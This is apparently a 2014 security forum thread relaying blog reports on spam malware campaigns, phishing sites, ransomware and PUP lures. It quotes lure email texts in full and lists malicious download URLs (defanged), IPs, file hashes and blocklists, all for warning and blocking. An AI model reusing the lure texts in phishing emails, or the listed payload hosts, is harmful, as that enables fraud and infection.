* http://www.ftc.gov/news-events/press-releases/2014/10/ftcs-request-court-shuts-down-new-york-based-tech-support-scam

> http://www.consumer.ftc.gov/blog

:fear: :mad:

AplusWebMaster
2014-10-28, 17:16
FYI...

Fake Invoice SPAM - Word doc malware
- http://myonlinesecurity.co.uk/please-find-attached-invoice-number-224244-power-ec-ltd-word-doc-malware/
28 Oct 2014 - "An email saying 'Please find attached INVOICE number 224244 from Power EC Ltd' pretending to come from soo.sutton[random number]@ powercentre .com with a subject of 'INVOICE [random number] from Power EC Ltd' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Please find attached INVOICE number 224244 from Power EC Ltd

28 October 2014 : INVOICE263795.doc - Current Virus total detections: 3/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... macro malware**... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414506485/

** http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/

- http://blog.dynamoo.com/2014/10/invoice-101760-from-power-ec-ltd-spam.html
28 Oct 2014
> https://www.virustotal.com/en/file/472f0f4a671a76b4f5773b3f64033bf5bf8933134786797525d2c6590cdf3398/analysis/1414519923/
Recommended blocklist:
62.75.184.70: https://www.virustotal.com/en/ip-address/62.75.184.70/information/
116.48.157.176: https://www.virustotal.com/en/ip-address/116.48.157.176/information/
___

Fake 'Ebola Alert Tool' ...
- https://blog.malwarebytes.org/online-security/2014/10/new-online-ebola-alert-tool-is-anything-but/
Oct 27, 2014 - "... More news of infection outside Africa such as this could further fuel the ever-increasing fear and anxiety for one’s own life and well-being, especially in terms of how one interacts with the outside world. People are trying to be more careful in their dealings than usual, always wanting to be on the know about the latest happenings. This is why web threats banking on perennial hot topics like Ebola could be effective lures against users, especially in the long run... Upon initial visit to the page, users are presented with the following prompt at the top-middle part of the screen:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/ebola-with-prompts-1024x341.jpg
Below is a screenshot of the downloaded file with an overview of its details:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/ebolafile.png
EbolaEarlyWarningSystem.exe has a low detection rate as of this writing—four vendors detect it out of 53*... Upon execution, it displays a user interface prompting users to install the ONLY Search toolbar with links to its EULA and Privacy Policy pages. Once users click the “Agree” button, they are again presented with other offers to download, such as a program called Block-n-Surf (a supposed tool used to protect children from adult-related content, System Optimizer Pro (a tool that purportedly optimizes the user’s system), oneSOFTperday (a tool that gives users access to free apps), and a remote access tool among others:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/install5.png?w=564
Once programs are installed, the following have been observed from affected systems: All browser default search pages are changed to ONLY Search:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/onlysearch.png
Once users open a new browser tab, affiliate sites are loaded up (e.g. a site offering insurance):
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/insurance-affiliate.png
Browser windows open to prompt user to install more programs:
> http://blog.malwarebytes.org/wp-content/uploads/2014/10/pckeeper.png
System Optimizer Pro executes:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/sysoppro-autoexec.png?w=555
- Affected machine slows down
- Shortcut files are created on the desktop
During testing, we haven’t seen any installation of the Ebola Early Warning System toolbar or evidence of warning alerts. We implore users not to be easily swayed with software solutions banking on the Ebola scare. They may be more about enticing internet users into downloading programs that may potentially do harm on their systems, instead of helping them be aware of the current situation**..."
* https://www.virustotal.com/en/file/4c7647ff605a9880f875010b5a09e7f1435b002ad4635dff6c4d14f218eb7dd7/analysis/1414142257/

** http://www.cdc.gov/vhf/ebola/

:mad: :fear:

AplusWebMaster
2014-10-29, 14:24
FYI...

Fake 'Order confirmation' from Amazon SPAM - trojan
- http://blog.mxlab.eu/2014/10/28/fake-order-confirmation-order-details-from-amazon-contains-trojan/
Oct 28, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Order Details”. This email is send from the spoofed address “Amazon .co.uk ” and has the following body:

Good evening,
Thank you for your order. We'll let you know once your item(s) have dispatched.You can view the status of your order or make changes to it by visiting Your Orders on Amazon .co.uk.
Order Details
Order R:131216 Placed on October 09, 2014
Order details and invoice in attached file.
Need to make changes to your order? Visit our Help page for more information and video guides.
We hope to see you again soon...

The 532 kB malicious file is not present in a ZIP file but attached directly and has the name order_report_72364872364872364872364872368.exe (numbers may vary). The trojan is known as Trojan.MSIL.BVXGen, BehavesLike.Win32.Dropper.qh or Win32.Trojan.Inject.Auto. At the time of writing, 3 of the 53 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/17de4b7fab716f6c87b5d3c941ecb5f5b01d5e4980cff71c88451acc90b22bb0/analysis/1414490630/

- http://myonlinesecurity.co.uk/amazon-com-alert-order-details-malware/
29 Oct 2014
- https://www.virustotal.com/en/file/6fb9d2d2de05751a90e70a2973a51a1cf38939075c6849b650b5f00b07183532/analysis/1414584579/
___

Phish - spoofed Google Drive
- http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-improve-scheme-with-spoofed-google-drive-site/
Oct 29, 2014 - "Cybercriminals and attackers are leveraging Google Drive site and brand to go under the radar and avoid detection. Just last week, a targeted attack* uses Google Drive as a means into getting information from its victims. This time, phishers are using a modified version of the legitimate Google Drive login page to steal email credentials. This attack can be considered an improved version of attacks seen earlier this year, which asked for multiple email addresses**.
Fake Google Drive Site: Users may receive an email that contains links that lead to the spoofed Google Drive site.
Spammed message containing links to fake site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive1.jpg
The phishing site allows user to log in using different email services, which is highly unusual as Google Drive only uses Google credentials. The site also has a language option that does not work.
Fake Google Drive site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive2.jpg
To trick the user into thinking nothing suspicious is afoot, the phishing site -redirects- the user to a .PDF file from a -legitimate- site about investments. However, this redirection to a site about investments may still raise suspicions as nothing in the email indicates the specific content of the “document” is related to finances.
After logging in, users are redirected to a legitimate site:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/fakegdrive3.jpg
... Mobile Users, Also Affected: Based on our investigation, this attack will also work on mobile devices. When users clicked the “Sign in” button, the PDF file download is prompted and the users’ credentials are sent out to the cybercriminals.
Screenshot of PDF prompt download in mobile devices:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/google_drive_fig8.jpg
... Users should exercise caution when opening emails, even those from known contacts. Avoid clicking links that are embedded in emails. Users can also check first by hovering their mouse over the link; doing so can reveal the true URL of the link in the status bar. Users can also check the legitimacy of the site before sharing any personal data, be it login credentials or contact details. They can check if the site address has any discrepancy (misspellings, different domain names) from the original site (e.g., <sitename .com> versus <sitename .org>). They should also check the security of the site before sharing any information... We have notified Google about this phishing page."

* http://blog.trendmicro.com/trendlabs-security-intelligence/targeted-attacks-stealing-information-through-google-drive/

** http://blog.trendmicro.com/trendlabs-security-intelligence/phishers-cast-wider-net-now-asking-for-multiple-emails/
___

Fake ticketmaster SPAM – PDF malware
- http://myonlinesecurity.co.uk/ticketmaster-tickets-sent-fake-pdf-malware/
29 Oct 2014 - "'ticketmaster tickets have been sent' pretending to come from confirmation-noreply@ ticketmaster .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Thank you for choosing Ticketmaster.
This email is to confirm ticket(s) have been purchased and attached:
Your Delivery Option is: printed
Your Transaction number is: 869064,00410 ...

29 October 2014: tikets224069_order_type_print_order_details.pdf.zip:
Extracts to: tikets109873_order_type_print_order_details.pdf.exe
Current Virus total detections: 7/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/203daa7fed582e06c8fd7bb770e1f8104c625261e0a03e44ab8ab7296bd4ffac/analysis/1414593309/
___

'Virtual Assistant' - PUP download site
- https://blog.malwarebytes.org/online-security/2014/10/pup-download-site-makes-use-of-virtual-assistant/
Oct 29, 2014 - "... suddenly there’s a person talking at you from the bottom right hand corner of the screen about how you should buy product X or make use of service Y? We recently saw a page asking visitors to upgrade their media player, which Malwarebytes Anti-Malware detect as PUP.Optional.SaferInstall (VirusTotal 12/53*). It looks a lot like many similar download sites out there [1], [2], with one curious addition standing over on the right hand side:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual1.jpg
A virtual assistant! She isn’t very interactive, instead launching into a recorded voiceover after a minute or so of the visitor doing nothing on the webpage. She says:
Please upgrade your media player for faster hd playback.
It only takes a minute on broadband and theres no restart required
Just click this button and follow the easy steps onscreen.
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/virtual2.jpg
... I haven’t seen a virtual assistant / automated online assistant / video spokesperson / video web presenter / whatever they’re called this week used to promote a PUP (Potentially Unwanted Program) download before... Who knows what.. advertising will offer up next..."
* https://www.virustotal.com/en/file/cf192f2c0c433b10ef963f199ae759264749c72a100d4b5907d555ec748cf519/analysis/1414085568/
... Behavioural information
TCP connections
66.77.96.162: https://www.virustotal.com/en/ip-address/66.77.96.162/information/
87.248.208.11: https://www.virustotal.com/en/ip-address/87.248.208.11/information/
90.84.55.33: https://www.virustotal.com/en/ip-address/90.84.55.33/information/
63.245.201.112: https://www.virustotal.com/en/ip-address/63.245.201.112/information/

1] http://blog.malwarebytes.org/wp-content/uploads/2014/01/asosvouchers5.jpg

2] http://blog.malwarebytes.org/wp-content/uploads/2013/12/obamapads4.jpg
___

Hacks use Gmail Drafts to update their Malware and Steal Data
- http://www.wired.com/2014/10/hackers-using-gmail-drafts-update-malware-steal-data/
10.29.14 - "... Researchers at the security startup Shape Security say they’ve found a strain of malware on a client’s network that uses that new, furtive form of “command and control” — the communications channel that connects hackers to their malicious software — allowing them to send the programs updates and instructions and retrieve stolen data. Because the commands are hidden in unassuming Gmail drafts that are never even sent, the hidden communications channel is particularly difficult to detect. “What we’re seeing here is command and control that’s using a fully allowed service, and that makes it superstealthy and very hard to identify,” says Wade Williamson, a security researcher at Shape. “It’s stealthily passing messages back and forth without even having to press send. You never see the bullet fired.” Here’s how the attack worked in the case Shape observed: The hacker first set up an anonymous Gmail account, then infected a computer on the target’s network with malware. (Shape declined to name the victim of the attack.) After gaining control of the target machine, the hacker opened their anonymous Gmail account on the victim’s computer in an invisible instance of Internet Explorer — IE allows itself to be run by Windows programs so that they can seamlessly query web pages for information, so the user has no idea a web page is even open on the computer. With the Gmail drafts folder open and hidden, the malware is programmed to use a Python script to retrieve commands and code that the hacker enters into that draft field. The malware responds with its own acknowledgments in Gmail draft form, along with the target data it’s programmed to exfiltrate from the victim’s network. All the communication is encoded to prevent it being spotted by intrusion detection or data-leak prevention. The use of a reputable web service instead of the usual IRC or HTTP protocols that hackers typically use to command their malware also helps keep the hack hidden. Williamson says the new infection is in fact a variant of a remote access trojan (RAT) called Icoscript first found by the German security firm G-Data* in August. At the time, G-Data said that Icoscript had been infecting machines since 2012, and that its use of Yahoo Mail emails to obscure its command and control had helped to keep it from being discovered. The switch to Gmail drafts, says Williamson, could make the malware stealthier still..."
* https://www.virusbtn.com/virusbulletin/archive/2014/08/vb201408-IcoScript
___

Dangers of opening suspicious emails: Crowti ransomware
- http://blogs.technet.com/b/mmpc/archive/2014/10/28/the-dangers-of-opening-suspicious-emails-crowti-ransomware.aspx
28 Oct 2014 - "... MMPC has seen a spike in number of detections for threats in the Win32/Crowti ransomware this month as the result of new malware campaigns. Crowti is a family of ransomware that when encountered will attempt to encrypt the files on your PC, and then ask for payment to unlock them. These threats are being distributed through spam email campaigns and exploits. Crowti impacts -both- enterprise and home users, however, this type of threat can be particularly damaging in enterprise environments. In most cases, ransomware such as Crowti can encrypt files and leave them inaccessible. That’s why it’s important to back up files on a regular basis... We also recommend you increase awareness about the dangers of opening suspicious emails – this includes not opening email attachments or links from untrusted sources. Attackers will usually try to imitate regular business transaction emails such as fax, voice mails, or receipts. If you receive an email that you’re not expecting, it’s best to ignore it. Try to validate the source of the email first -before- clicking on a link or opening the attachment... The graph below shows how Crowti ransomware has impacted our customers during the past month.
Daily encounter data for Win32/Crowti ransomware:
> http://www.microsoft.com/security/portal/blog-images/a/crowti1.png
Computers in the United States have been most affected with 71 percent of total infections, followed by Canada, France and Australia.
Telemetry data for Win32/Crowti by country, 21 September – 21 October 2014:
> http://www.microsoft.com/security/portal/blog-images/a/crowti2.png
Crowti is being distributed via spam campaigns with email attachments designed to entice the receiver to open them. We have seen the following attachment names:
VOICE<random numbers>.scr
IncomingFax<random numbers>.exe
fax<random numbers>.scr/exe
fax-id<random numbers>.exe/scr
info_<random numbers>.pdf.exe
document-<random numbers>.scr/exe
Complaint_IRS_id-<random numbers>.scr/exe
Invoice<random numbers>.scr/exe
The attachment is usually contained within a zip archive. Opening and running this file will launch the malware... Our telemetry and research shows that Win32/Crowti is also distributed via exploits kits such as Nuclear, RIG, and RedKit V2. These kits can deliver different exploits, including those that exploit Java and Flash vulnerabilities... Crowti's primary payload is to encrypt the files on your PC. It usually brands itself with the name CryptoDefense or CryptoWall... we saw a Crowti sample distributed with a valid digital certificate which was issued to Trend... This is not associated with Trend Micro and the certificate has since been revoked. Crowti has used digital certificates to bypass detection systems before - we have previously seen it using a certificate issued to The Nielsen Company... There are a number of security precautions that can help prevent these attacks in both enterprise and consumer machines. As well as being aware of suspicious emails and backing up your files, you should also keep your security products and other applications up-to-date. Attackers are taking advantage of unpatched vulnerabilities in software to compromise your machine. Most of the exploits used by Crowti target vulnerabilities found in browser plugin applications such as Java and Flash. Making a -habit- of regularly updating your software can help reduce the risk of infection... we also recommend running a real-time security product..."

:fear::fear: :mad:

AplusWebMaster
2014-10-30, 12:05
FYI...

Fake Securitas SPAM – PDF malware
- http://myonlinesecurity.co.uk/securitas-mail-report-attached-fake-pdf-malware/
30 Oct 2014 - "'From Securitas Mail Out Report Attached' pretending to come from Alert ARC Reports is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

From Securitas, please do not reply to this e-mail as it is auto generated.
For any problems please e-mail derry.andrews@ securitas .uk.com

30 October 2014: Q100982010_Mail Out Report.zip: Extracts to: Q100771292_Mail Out Report.exe
Current Virus total detections: 1/54* . This 'From Securitas Mail Out Report Attached' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/835a6a272b252576247a6f51bd1fc6e4ac972284435759baa8fd4f926c25bd97/analysis/1414659759/
___

Fake 'Accounts Payable' SPAM - malware .doc attachment
- http://myonlinesecurity.co.uk/reminder-word-doc-malware/
30 Oct 2014 - "An email with a Microsoft word doc attachment saying 'Please see attached statement sent to us' pretending to come from random names with a subject of 'Further Reminder' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The name of the alleged sender matches the name of the 'Senior Accounts Payable Clerk from the Finance Department' in the body of the email... word macro malware*... The email looks like:
Good afternoon,
Please see attached statement sent to us, I have highlighted on this the payments made to you in full and attached a breakdown of each one for you to correctly allocate. Hope this helps.
Thanking you in advance.
Many Thanks & Kind Regards
Vivian Dennis
Senior Accounts Payable Clerk
Finance Department ..

30 October 2014 : CopyHA779333.doc - Current Virus total detections: 0/53**. Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* http://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/

** https://www.virustotal.com/en/file/949d05c3e51abcee43c74c5309a61b18ffa1cf17cb0be06bdab1a4e52cadb8f5/analysis/1414671500/

- http://blog.dynamoo.com/2014/10/further-reminder-spam-has-malicious.html
30 Oct 2014
... Recommended blocklist:
212.59.117.207: https://www.virustotal.com/en/ip-address/212.59.117.207/information/
217.160.228.222: https://www.virustotal.com/en/ip-address/217.160.228.222/information/
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
81.7.3.101: https://www.virustotal.com/en/ip-address/81.7.3.101/information/
195.154.126.245: https://www.virustotal.com/en/ip-address/195.154.126.245/information/
___

Fake Job offer SPAM - malware
- http://myonlinesecurity.co.uk/job-service-new-offer-job-malware/
30 Oct 2014 - "'Job service New offer Job' pretending to come from Job service is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/new-offer-job.png

30 October 2014: job.pdf.zip: Extracts to: job.pdf.exe
Current Virus total detections: 3/53*. same malware as today’s version of my new photo malware**. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2723a595350cb632eac5f98a794265105e49e1be181a50437184482b32075b94/analysis/1414662840/

** http://myonlinesecurity.co.uk/new-photo-malware/
___

Malicious Browser Extensions
- http://blog.trendmicro.com/trendlabs-security-intelligence/an-in-depth-look-into-malicious-browser-extensions/
Oct 29, 2014 - "Malicious browser extensions bring about security risks as these often lead to system infection and unwanted spamming on Facebook. Based on our data, these attacks have notably affected users in Brazil. We have previously reported that cybercriminals are putting malicious browsers in the official Chrome Web store. We also came across malware that -bypasses- a Google security feature checks third party extensions... we performed an in-depth analysis of malicious Chrome browser extension and its evasion tactics, after receiving samples in from Facebook. Facebook’s Security team conducts their own malware research and they regularly collaborate with Trend Micro to keep their service safe... Based on our data starting from May 2014 onwards, Trend Micro HouseCall has helped about 1,000,000 users whose computers have been infected by malicious browser extensions. The top affected countries are mostly located in the Latin American region, such as Brazil, Mexico, Colombia, and Peru.
Top affected countries:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/FB-extension-infection.jpg
... We strongly advise users to avoid clicking links from messages, even if they appear to come from your friends. Users can also opt to use Trend Micro HouseCall* to secure their systems from online threats, including those that may leverage or abuse Facebook. Trend Micro and Facebook are working closely together to combat this threat. Below is the SHA1 hash of the malicious file:
4733c4ea00137497daad6d2eca7aea0aaa990b46 "
* http://housecall.trendmicro.com/
___

Popular Science site compromised
- http://community.websense.com/blogs/securitylabs/archive/2014/10/28/official-website-of-popular-science-is-compromised.aspx
28 Oct 2014 - "... injected with a malicious code that -redirects- users to websites serving exploit code, which subsequently drops malicious files on each victim's computer... injected with a malicious iFrame, which automatically redirects the user to the popular RIG Exploit Kit..."

:mad: :fear:

AplusWebMaster
2014-10-31, 14:25
FYI...

Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
31 Oct 2014 - "This -fake- Amazon email comes with a malicious Word document attached:
From: Amazon.co.uk [auto-shipping@ amazon .co.uk]
Reply-To: "auto-shipping@ amazon .co.uk" [auto-shipping@ amazon .co.uk]
Date: 31 October 2014 09:12
Subject: Your Amazon.co.uk order has dispatched (#203-2083868-0173124)
Dear Customer,
Greetings from Amazon .co.uk,
We are writing to let you know that the following item has been sent using Royal Mail.
For more information about delivery estimates and any open orders, please visit ...
Your order #203-2083868-0173124 (received October 30, 2014) ...

The Word document contains a malicious macro... but is currently undetected at VirusTotal* (the Malwr report doesn't say much...). The macro then downloads http ://ctmail .me/1.exe and executes it. This malicious binary has a detection rate of 4/52**... 84.40.9.34 is Hostway in Belgium, 213.143.97.18 is Wien Energie, Austria. The malware also downloads a DLL as 2.tmp which has a detection rate of 3/54***.
Recommended blocklist:
213.143.97.18
84.40.9.34
ctmail .me "
* https://www.virustotal.com/en/file/30990e856868cf63c8b680aa333d687f38a1efe03c11aea1a290f30c5d6668ac/analysis/1414752406/

** https://www.virustotal.com/en/file/8c79bff0c302a0c1762fc59ab7001001a9293506197579213e087868493b756e/analysis/1414752639/

*** https://www.virustotal.com/en/file/7534ac5bbb9ff975a744c39320e7d372e80007a1896a04533a8a4b92633bf369/analysis/1414754766/

- http://myonlinesecurity.co.uk/amazon-co-uk-order-dispatched-203-2083868-0173124-word-doc-malware/
31 Oct 2014
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Your-Amazon.co_.uk-order-has-dispatched-203-2083868-0173124.png
* https://www.virustotal.com/en/file/3499806174ac4cf3f707e5c25a7b334548f6ac3b9a2267d35772332d33d56238/analysis/1414744958/
___

Fake 'Confirmation' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/site-management-services-central-ltd-remittance-confirmation-word-doc-malware/
31 Oct 2014 - "An email saying 'Please find attached Remittance and BACS confirmation for September and October Invoices' pretending to come from random names, companies and email addresses with a subject of 'Remittance Confirmation [random characters]' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Good morning,
Please find attached Remittance and BACS confirmation for September and October Invoices
Best Wishes
Lynn Blevins
Accounts Dept Assistant
Site Management Services (Central) Ltd ...

31 October 2014 : CU293705.doc - Current Virus total detections: 0/52*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5b38d77c33938254fa50ced98a7471dbe4b8ec2aceb1ae2863bb14c812f0f226/analysis/1414747524/
___

Chrome 40 to terminate use of SSL ...
- http://www.theregister.co.uk/2014/10/31/google_puts_down_poodle/
31 Oct 2014 - "... Update 40* will remove SSLv3 and the hard-to-exploit cookie-stealing Padding Oracle on Downgraded Legacy Encryption (POODLE) attack. Cupertino followed -Redmond- in its browser POODLE put-down after a single click FixIt SSLv3 disabler was issued for Internet Explorer** ahead of removal in a few months. Google security engineer Adam Langley wrote in an update that some buggy servers may stop working as a result... -Chrome- 39 will show a yellow flag over the SSL lock icon, the protocol design flaw that allowed hackers to hijack victims' online accounts and which prompted tech companies to dump SSLv3 in upcoming releases such as -Mozilla's- Firefox 34***..."
* https://groups.google.com/a/chromium.org/forum/#!topic/security-dev/Vnhy9aKM_l4

** https://support.microsoft.com/kb/3009008#FixItForMe

*** https://blog.mozilla.org/security/2014/10/14/the-poodle-attack-and-the-end-of-ssl-3-0/

:mad: :fear:

AplusWebMaster
2014-11-03, 15:52
FYI...

Fake invoice SPAM – Word doc malware
- http://myonlinesecurity.co.uk/new-invoice-random-characters-created-word-doc-malware/
3 Nov 2014 - "An email saying 'A new invoice has been created. Please find it attached' pretending to come from TM Group Helpdesk Billing with a subject of 'A new invoice [random characters]' has been created for You' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Dear Client,
A new invoice, WJ7647670C has been created. Please find it attached.
Kind regards, Marcellus Powell
TM Group
Helpdesk Billing

3 November 2014 : PI646028B.doc - Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/3c31fec4b4f77ef581151d87313631956c18bbac82a30c389bdb59b3f5b1b31b/analysis/1415010191/

- http://blog.dynamoo.com/2014/11/tm-group-new-invoice-ab1234567c-has.html
3 Nov 2014
... Recommended blocklist:
91.222.139.45
213.140.115.29
149.62.168.210
111.125.170.132
121.78.88.208 "
___

Fake Amazon SPAM - malicious DOC attachment
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-has-dispatched.html
UPDATE 1: 2014-11-03 - "... different version of the attachment (called ORDER-203-2083868-0173124.doc) which has a VirusTotal detection rate of 0/54* and contains this malicious macro... This downloads a file from http ://hilfecenter-harz .de/1.exe which also has zero detections at VirusTotal... It also downloads a malicious DLL... this as a version of Cridex...
Recommended blocklist 2:
84.40.9.34
37.139.23.200
hilfecenter- harz .de
garfield67 .de
* https://www.virustotal.com/en/file/554695f6d0cd97c2a31fc7f205f3ac3b364f0154d70be41685731f1226e8eeaf/analysis/1415004635/

:mad: :fear:

AplusWebMaster
2014-11-04, 14:03
FYI...

Fake 'New order' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/new-order-7757100-site-word-doc-malware/
4 Nov 2014 - "'New order 7757100' from site is an email saying 'Thank you for ordering' pretending to come from random names at random companies with a subject of 'New order 7757100 from site' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has what appears to be a genuine word doc attached which is -malformed- and contains a macro script virus... DO NOT follow the advice they give to enable macros to see the content. Almost all of these malicious word documents appear to be -blank- when opened...

Screenshots: http://myonlinesecurity.co.uk/wp-content/uploads/2014/11/New-order-7757100-from-site.png

- http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/protected-view-macros.png

4 November 2014 : Order561104135.doc - Current Virus total detections: 1/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/16e0fbdbab2fd8d88e8ab1a7ca42e4dc2ea9682ede6a06e6c3a85dae499cec1b/analysis/1415093505/
___

Fake 'Remittance' SPAM – Word doc malware
- http://myonlinesecurity.co.uk/duco-remittance-advice-november-word-doc-malware/
4 Nov 2014 - "An email saying 'Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP' pretending to come from DUCO with a subject of 'Remittance Advice November' [ random characters] with a malicious word document attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:

Dear Sir/Madam
Please find attached the details of the payment credited to your account for the sum of 1739.67 GBP
Regards,
Domenic Burton
Accounts Payable Department DUCO

4 November 2014 : De_BW574826C.doc - Current Virus total detections: 0/44*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/792e5c3c2886d6fe7d0b10a25fd78023a7b862a79bd6e461a5e23ecccbc371ef/analysis/1415106043/

- http://blog.dynamoo.com/2014/11/duco-remittance-advice-november-spam.html
4 Nov 2014
- https://www.virustotal.com/en/file/3d6378750d713270bbafc1a18754626d148396253429a6a70c018eadb988120a/analysis/1415110852/
... Behavioural information
TCP connections
91.222.139.45: https://www.virustotal.com/en/ip-address/91.222.139.45/information/
213.140.115.29: https://www.virustotal.com/en/ip-address/213.140.115.29/information/
___

'C-93 Virus Alert' - Phish ...
- http://www.hoax-slayer.com/C93-virus-alert-phishing-scam.shtml
Nov 4, 2014 - "An email claiming to be from Windows Outlook warns that a 'C93 Virus' has been detected in your mailbox and you are therefore -required- to -click- a link to run a Norton anti-virus scan to resolve the issue. The email is -not- from Outlook or Microsoft. It is a phishing scam designed to trick you into giving your Microsoft Account login details to criminals... According to this email, which claims to be from 'Windows Outlook', a 'C93 Virus' has been detected in your mailbox. The message instructs you to click a link to run a Norton anti-virus scan that will 'remove all Trojan and viral bugs' from your account. But, warns the message, if you fail to run the scan, your mailbox will be -deactivated- ... Example:
Dear Outlook Member,
A C93 Virus has been detected in your mailbox, You are required to apply the new Norton AV security anti-virus to scan and to remove all Trojan and viral bugs from your mailbox Account, Failure to apply the scan your mailbox will be De-Activated to avoid our database from being infected.
Click on Optimal Scan and Log in to apply the service.
Thank you ...

If you click the link, you will be taken to a -fake- webpage that is designed to look like a genuine Microsoft account login. When you enter your login details and click the 'Sign In' button, you will be automatically -redirected- to a genuine Microsoft account page... the criminals can collect your login details and use them to hijack your real Microsoft Account. Because the same credentials are used to login to various Microsoft services, they are a valuable commodity for scammers... If you receive one of these -fake- virus warnings, do -not- click any links or open any attachments..."
___

Bitcoin bonanza - or blunders?
- https://www.virusbtn.com/blog/2014/11_04.xml
4 Nov 2014 - "... 'occasionally losing a lot of money through bugs and blunders... 'hard not to feel dizzy and somewhat overwhelmed by the security issues and implications.
> https://www.virusbtn.com/virusbulletin/archive/2014/11/figures/Pontiroli-1.jpg
Malware targeting Bitcoin wallets or using other people's resources to mine for cryptocurrencies are perhaps the least of our worries. What about virus code (or worse, child abuse material) ending up in the blockchain? Or the common flaw of transaction malleability? Or the almost existential threat of the "51% attack"? Cryptocurrencies are here to stay, but they come with their own unique set of problems that we cannot ignore... we're not in Kansas anymore..."
(More detail at the top virusbtn URL.)

- https://www.virusbtn.com/blog/2014/10_31a.xml
31 Oct 2014
___

Facebook: gov't requests for user data rises 24%
- http://www.reuters.com/article/2014/11/04/us-facebook-data-idUSKBN0IO21Z20141104
Nov 4, 2014 - "Facebook Inc said requests by governments for user information rose by about a quarter in the first half of 2014 over the second half of last year. In the first six months of 2014, governments around the world made 34,946 requests for data. During the same time, the amount of content restricted because of local laws increased about 19 percent... Google reported in September a 15 percent sequential increase in the number of requests in the first half of this year, and a 150 percent rise in the last five years, from governments around the world to reveal user information in criminal investigations."

:mad: :fear:

AplusWebMaster
2014-11-05, 15:31
FYI...

Backoff PoS malware - stealthier, more difficult to analyze
- http://net-security.org/malware_news.php?id=2906
